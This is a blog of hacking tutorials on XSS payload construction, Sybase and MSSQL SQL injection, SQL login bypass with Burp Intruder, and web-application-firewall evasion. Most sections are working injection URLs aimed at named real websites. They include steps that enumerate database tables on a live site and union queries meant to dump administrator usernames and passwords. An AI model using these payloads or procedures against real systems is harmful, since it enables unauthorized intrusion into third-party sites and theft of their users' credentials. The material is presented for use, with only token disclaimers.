Thursday 29 May 2014

CROSS SITE SCRIPTING (XSS)



What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.<exlanation from Wikipedia>

Let’s XSS

XSS is not just pasting XSS attack vectors in search boxes , and address bars , you have to know where that input is going , how is it being parsed , etc... If you wanna learn how to find XSS holes on pages first you need to have atleast basic knowledge of HTML , Javascript and a little bit of PHP . So in this paper I will go over some XSS vulnerable websites from XSSed.com , and we will be reviewing source code of those vuln web sites. My main goal is to show you how to properly build your XSS attack vector.



I will not:
1. Show you how to steal cookies
2.Take responsibility for your action after you read this paper.

 http://www.un.lk/media_centre/press_releases.php?id=XSSTest 

Lets try and change the # to something else , for example. id=XSSTest and we see that no error is shown so we can assume that webpage has accepted our input , lets see where in the source is our XSSTest string located.



Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :





Great in both examples we are already inside JavaScript


But this doesn’t proves anything , lets see will <> be parsed so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] :

Great our input is not being parsed , if it were we would have &lt;script&gt;
instead of <script> .

I will show you 2 options how to exploit it :

1. jshow(<script>) in here you can see we are already inside the javascript so we can just do
Code:
www.un.lk/media_centre/press_releases.php?id=alert(0)


and our alertbox will be executed. Why , you ask? Look at the source code :

Our alertbox is taken as valid input and processed by our browser and there you have alertbox.[ onload= ] is Jscript event that triggers when page is loaded , so when you call it onload="Here is where javascript is located" , everything inside onload event will be processed as valid input , and so is our alert(0).

2.Every element on webpage has it’s openning [ < ] and closing [ > ] tag.
);jshow(<script>);"> as you can see closing is done with );"> so it goes like this alert(0) );"> , so for our XSS to work we must close the body tag and start a new <script> tag.So in this case we use :
Code:
www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>


<script language="javascript" type="text/javascript" defer="defer">

 news_toggle_visibility(<script>);

 </script>

to escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started new one<script>alert(0)</script> )


The url is :
Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

or we can do this :

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

We just added <script>alert(12 vector and );</script> just closed our injected script tag.
Code:
http://www.chip.de/ii/grossbild_v2.html?sales=2122


Time to review the code , after searching for value 2122 inside the source code we get :

As you can see like in our first example we are already inside <script> tag , but in this case we have to close the value and input new Jscript code , in our case we have "2122"; so first part of our XSS vector will be "; . So lets try "; alert(0);
Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);


As you can see we are inside the script but no alertbox is shown , but why is that , it’s because of "; after our XSS attack vector , and as you can see every value that is assigned to variable has opening " and closing " and in our case we have closed somtr.prop48=" value with "; but there is "; left unclosed. You can see the problem first value is closed but what is with third " , we have to close it too , so our XSS link will be :
Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); Acid="XSS


So lets see the source :

As you can see we closed the third " and our alertbox is shown , so the rule is try to close either every tag or every value with your XSS attack vector...You will have less errors on the page you are XSSing and your XSS vector will look cooler .
Code:
http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]


Self XSS is XSS attack that is trigered when user enters payload inside the vulnerable input box , it takes SE for this type of XSS.Unlike for GET method when we can see our XSS payload inside the link bar in our browser , POST method wont show you what is webpage sending to server , so we have to use tools to see what POST values we are sending to server , we can use :

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes , one says "Login ili mobitel" and the other "Lozinka" , so lets input something inside those two input boxes and press OK button.
Lets input Text"<>/\ in "Login ili mobitel" field and Text2"<>/\ in "Lozinka" field. We get an error but lets see where did our input go , so here is the source :


Spoiler (Click to View)


What happened:

"> ----that closed src value in opened iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

and thats it , we escaped the iframe tag with "></iframe> and added new script tag <script>alert(0)</script>.To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!— (coments out the rest of code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out )

And now , maybe you think that XSS attacks can’t make any damage but big companies like Google and Facebook have a reward program for XSS findings on their sites , cos XSS attacks can be used to steal users cookies [http://jehiah.cz/a/xss-stealing-cookies-101 ]] and when you consider that big companies have millions of users , vulnerability like XSS can have devastating effect.
Se lets analyze Google XSS vulnerability which was found by ElvinGuitar, user from HackForums.net :

Vuln. link :
Code:
https://www.google.com/voice/rates?p=
Lets try :
Code:
https://www.google.com/voice/rates?p=XSSTest

 We get the same page so out input is accepted , and now lets review the code :
Here is our input lets evaluate how we can exploit it , so first we notice we are inside the script , and we have '); as our first part of XSS attack vector , so lets do this

Code:
https://www.google.com/voice/rates?p='); alert(0);</script>
So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>

We closed the value with '); and added our alert event alert(0); and we close the script tag with </script> and we get our alert box.

Seems easy doesn’t it , well ElvinGuitar got 1000$ for that XSS .

And now facebook :
Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
So here is one advice , try searching the values from the url inside the source code , so in this case we would search the c4c288b438ed080 value and this is what we get , also you should search every value after the = in Url , and see where it’s located , so here is the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nice , so lets replace c4c288b438ed080 with Test<>"\/ an we get this :
Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Great , our input is not being encoded , so we see we are inside the {[ ]}; brackets , so we have to close that value with MaXoNe″]}; alert(0); // and so the url will be :
Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=acid″]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage(„whatever“, „whatever“, 90, 60, 80);});
...
</script>

What happened , well ″]}; closed the value and alert(0); triggered our alerbox and // is used to coment out the rest of the code all the way to the </script>.

We could use this too :
Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
The difference is that we closed the script tag and commented the rest of the code , like this :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry[″MaXoNe″]};alert(0); </script><!—″].saveUploadedImage(″whatever″, ″whatever″, 90, 60, 80);});
...
</script>

The green code is commented out because of the <!-- .

And this one I found on ea games site :
Code:
http://www.ea.com/search?q=

So lets try :
Code:
http://www.ea.com/search?q=Test<>/\″


And lets see what we got :
We see that <> is filtered(deleted) but ″ is not being encoded , now we know that we can escape the value of title=″ ″ so first part of our XSS payload is ″ and what can we do next , lets see , first we can’t use < > so no script , img , body or any other tag , but we are inside the <h1> tag which is the heading value , and there are Jscript events that can be used by almost every HTML element , like :

onmouseover= activates JScript code when user moves mouse over HTML tag to who event belongs.

onclick= activates JScript code when user clicks on HTML tag to who event belongs.

ondblclick= activates JScript code when user dblclicks on HTML tag to who event belongs.

onmouseout= activates JScript code when cursor leaves the are off HTML tag to who event belongs.

So we can do this :
Code:
http://www.ea.com/search?q="onclick="alert('MaXoNe');""


Code :

Spoiler (Click to View)

With " we escaped the value , and added onclick=alert("MaX"); event and with next " we closed the value that was left behind , or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of code all the way to > . So when we click the heading we get alertbox .

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--


There are vuln. columns shown on the page , we will select column 8 , so lets see the source :

We will use :
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/acid/)</script><font>',9,10,11—
Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enable we can bypass it by hexing our value :
Code:
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179  and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7​,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again review the source to find out why did I used this payload.

Thats all from me , my advice go on XSSed.com , and look at mirrors , search the code ,try different XSS payloads, be creative.
Also if you want to be good XSSer master HTML and Jscript , there is no other way.
Posted by at No comments:

Sybase SQL injection Tutorial


Heya guys today I will make a small tutorial on error based sybase sql injection(that is its name I guess)

So here we start with a site...am assuming u understand mysql injection

http://www.okfarmbureau.org/index.php?ac...&rowid=630

put a ' at the end and you will see this
Sybase: Server message: Unclosed quote before the character string ' '

now to get the version:
Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29-- 

so here is the version:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006
now lets get some tablenames

Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))-- 

second table:
Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects wheretype='U' and name!='boardMembers'))-- 

basically keep adding and name!='table name that you get'

here I guess i reach the end of the tables
Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' andname!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' andname!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import'and name!='publications' andname!='publications_new' and name!='radio' and name!='satellites' and name!='titles')) 


time to get columns..We will get the columns of boardMembers
Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id fromsysobjects where type='U' and name='gallery')))-- 
column no.1:
city

getting column 2:
Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))-- 

you get my point just add and name!='column name you get'

that is how I know it..If I am wrong at anything please correct me
Posted by at No comments:

MSSQL asp SQL INJECTION

Ok guys i'm gonna give u a tut on Sql injection this is written by me!

The sql injection on asp is same as on php...but a little bit of changes are made...

So first of all we will find some site that is Vulnerable and is on .asp

So assume that u got a site with the name of
Code:
http://www.target.com/
now find page where the site is vul to sql injection...

You can check the Vulnerability by adding single quotation '
at the end of URL like
Code:
http://www.target.com/product.asp?id=13'

If u get this error...
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query
Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error.

Code:
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.

Now we will write the query as...

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password ;)
URL will be like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Hopes i will helped you , in this type of injection we don't get much working scripts to get tables etc if i get working ones i will update this tut soon ...  enjoy !!
Posted by at No comments:

BURP SUITE SQL AUTHENTICATION BYPASS

Today I am going to extend my previous tutorial where I introduced you to Burp Suite tools so that we can now audit login forms for SQL Authentication Bypass vulnerabilities. This is a common problem found daily in the wild where PHP & MySQL are being used as the Authorization mechanism based on dynamic SQL Query's which are completed from user input supplied through login form. This can be time consuming and repetitive to conduct manually but it is relatively easy to audit - and after reading this it will be even easier, especially with Burp! I will first provide an explanation of the problem and what is going on which allows the vulnerability to be exploited followed by an example, so here goes…

As mentioned above Authentication Bypass vulnerabilities often occurs due to a lack of filtering of user supplied input. If we review a quick example of code from a PHP/MySQL authentication page we will begin to see things more clearly. You can find some test samples with quick Google dork “file:php/asp inurl:admin/login”, but here is sample login to keep it easy:
Code:
<?php
$sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $POST_['password'] . "'";
response = mysql_query($sql);
?>

This code fails to filter or check the user supplied input. The target system reads like so as result:
Code:
SELECT * FROM users WHERE user='' AND password=''


Since this is not filtered or checked we will pick a username and use SQL Injection on the secondary field. Let us assume we choose the username “webadmin” and the SQL Injection: ' OR 'x' = 'x

This is now how the query looks that will get passed through:
Code:
SELECT * FROM users WHERE user='webadmin' AND password='' OR 'x' = 'x'


This is how the target system actually reads & parses the request:
Code:
SELECT * FROM users WHERE user='webadmin' AND TRUE
The ultimate goal here is to use our SQL injection to alter the SQL query so that it is fooled into letting us in. This works as you can see above as ‘x’ is always going to be equal to ‘x’ so it will always return as TRUE, and thus the system will grant us webadmin user access to walk right in through the front door without any real password.

Now we could use alternative injections above, like:
  • ' or '1'='1
  • ' or 'x'='x
  • ') or ('x'='x
  • ') or ('1'='1
  • …etc

Some customization may be needed to fit your specific need (Sometimes injections need to be placed in both fields; sometimes it needs more complex syntax, HEX or Char encoding may be needed, etc). You could easily build your own list, but I have gone ahead and put together a decent list to help get you started. The list can be found in the "AuthBypass/auth-bypass.txt" file which is included in my full download here: HR’s Burp Starter Pack .

Now with Burp Suite:
Now rather than try each potential SQL statement or injection we place all of our potential injections into a single file and then let Burp run the requests in an automated fashion. This will help to save you time, as well as allow easier parsing of the results in a systematic way. In order to do this we simply submit a bogus request with arbitrary data submitted (user: foo, pass: bar). 

[Image: 62672264.png]

[Image: 28054744.png]

[Image: 21137854.png]

We then load up the request and send it to the Intruder tool to build our attack. We clear the default injection points and specifically set them around our password field or both user and password fields. You will choose the Sniper or Battering Ram attacks for this method, depending on how you want to test the form. You will then need to set the payload to run your auth-bypass.txt file. You can add some additional inspection items to the grep field if you want. I find it is often helpful to add some basic text you might see upon failed or successful login attempts (welcome, success, failed, wrong, etc).


Once you run the Intruder tool it is time to sit back and interpret the results. You will need to check time, length, grep, etc and manually review any of the requests that appear to show a noticeable variance in responses.


Once you find one, re-test it manually in the browser to see if it works.
[Image: 89323078.png]

If it works you are in, if not keep analyzing and inspecting further. 
[Image: 28104046.png]

Rinse, wash, and repeat as necessary

Posted by at No comments:

WAF BYPASSING TECHNIQUES


I assume you know how to perform a union based SQL injection, if not check out my tutorial here:



Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5​7,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you would like to do now is you use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5​7,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5​,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33​,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6​0,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5​,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33​,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6​0,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part; lets try to find all the databases, here is the regular syntax: 

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22​,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22​,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,​23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49​,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,​23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49​,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

it's the same to get columns, you know the drill.

If you now want to dump columns id from admin table you do like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25​,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5​2,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless
Posted by at No comments:

BASIC SQL INJECTION WITH WAF BYPASSING


Basic sql injection.

+ string injection (forcing an error)

For educational purposes only.


What do we need?

1. This tutorial.
2. Notepad. Because, using a pen and paper would take to long.
3. A vulnerable site.

Lets start.

1. Check the site, if it is vulnerable.

Enter ' behind the link
Code:
http://www.[site].com/page.php?id=1

Code:
http://www.[site].com/page.php?id=1'

If something like this pops up? Then it is vulnerable:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1

2. Next up, we do the oder by statement. This wil show us how many columns we have.


http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [error]
Why do i do order by 99?
To check if we don't have to use a string injection.
If you do not get an error when u use order+by+99--+-
Then we wil need to force an error.

Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [no error]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [no error]
As folowing:
Always place a ' behind the id number.

Code:
http://www.[site].com/page.php?id=1'+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1'+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+4--+- [error]
Now we had this part. Lets move on to the union statement.
We know we have 3 columns now.

[attention]If, you force an error! Never forget to use the ' behind the id number.[attention]

3. Union Select.

Code:
http://www.[site].com/page.php?id=1+union+select+1,2,3--+-
Now there wil popup some numbers in the content of the site.
Lets say, i see a big 2 in the middle of my site.

That means we have a vulnerable column.
We wil check version now.
Code:
http://www.[site].com/page.php?id=1+union+select+1,version(),3--+-

If that dous not work do this:

Code:
http://www.[site].com/page.php?id=1+union+select+1,@@version,3--+-
You wil see the mysql version now.
We always want it to be 5.x.x or more!
Not lower then 5 if it is give up.

Lets say mine is: 5.0.92 - community
That means im readdy to roll.

4. Select database name:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(database()),3--+-

Or simply do:

Code:
http://www.[site].com/page.php?id=1+union+select+1,database(),3--+-

If you want to find all the database's? is some cases a site has more then 1!
do this:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(schema_name),3+from+information_schema​.schemata--+-
Lets say my database is caled "db_1" no quotes.
This line asks the database which name it has.
The group_concat is a line we use to select annything we need.

5. Select table names:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.​tables+where+table_schema=database()--+-

\The group_concat statementh has a max length of 1024 characters.
If we want to find all tables you could do this manually using concat() and a limit.

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.​tables+where+table_schema=database()+limit+0,1--+-
keep increasing that limit untill you have all tables.

Now you should have a list whit alot of names in there.
we select what we need.

Lets check for:
User"s", admin"s"
administrator"s", member"s"
tbladmin"s",tblmember"s"
tbluser"s",tbladministrator"s"
tbl_admins, ..

Lets say i have a administrator table.

6. Select column names:

Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema​.columns+where+table_name="administrator"--+-
You couild use the limit here to. "limit+0,1--"
if you do not see all columns.

If you get an error "DO NOT BE SCARED" it is not lost.
Its a hex: http://www.swingnote.com/tools/texttohex.php
Place the table name my case: administrator where it says:
Say hello to my little friend!

Translate: 61646d696e6973747261746f72 (administrator)
this is my hex.

How to ad it to a link. Wel, where u now have ble_name="administrator"--+-
At the end of your link. We need to change to this. ble_name=0x--+-

And place the hex behind the 0x.
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema​.columns+where+table_name=0x61646d696e6973747261746f72--+-

Now you should see alot of names again. Look for username and password or email/password or name/pass whatever relates.
Mines are user and pass.
How do we select these. Not that hard at all.

We use the group_concat(user,0x3a,pass) 0x3a is nessesairy it means colon.
At the end: +from+db_1.administrator
The db_1 is the database we searched at start.
And, you do not need to use a hex now!

As following:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3+from+db_1.administra​tor--+-
If annything went good? You should now have the admin name and password.

7. WAF bypassing. (basics)

When you have an error using the union select statement.
It is most likely because the admins made an attempt to secure against sqli.

Those admins fail...

So we have to make sure we can actually use the union statement.
to get what we need. a basic example: /*!union*/+/*!select*/
the /*! */ is bypassing the WAF because they only ignored union+select.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,2,3--+-
If all good we should get the vulnerable numbers now.
There are many ways to bypass WAF.
example: un>ion+sel>ect
or: UnIoN+SeLeCt

Now we bypassed it? we still need information from the columns.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,CoNcAt(version()),3--+-
This should get you the version.
Same for database.
Now we need tables.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,GrOuP_CoNcAt(/*!table_name*/),3+FrOm+/*!information_schema*/.TaBlEs+WhErE+/*!table_schema*/=database()--+-
I suggest you take some tutorials on waf bypassing. i have shown some little basics.


I wil not be teaching you how to decrypt those passwords.

Do not copy & paste. Type anything you see in the url.
You will learn alot faster! And, your mind will be 100% focused on the SQLi.
Posted by at No comments:
Subscribe to: Posts (Atom)